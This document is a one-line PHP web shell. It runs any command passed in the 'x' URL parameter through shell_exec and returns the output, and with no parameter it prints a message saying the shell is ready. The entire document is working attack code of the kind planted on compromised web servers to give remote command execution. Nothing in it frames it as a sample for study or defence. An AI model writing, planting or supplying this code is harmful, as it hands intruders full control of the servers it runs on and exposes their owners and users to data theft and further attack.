<?php if (isset($_GET['x'])) { echo '<pre>' . shell_exec($_GET['x']) . '</pre>'; } else { echo 'SUCCESS: Shell is ready. Use ?x=command'; } ?>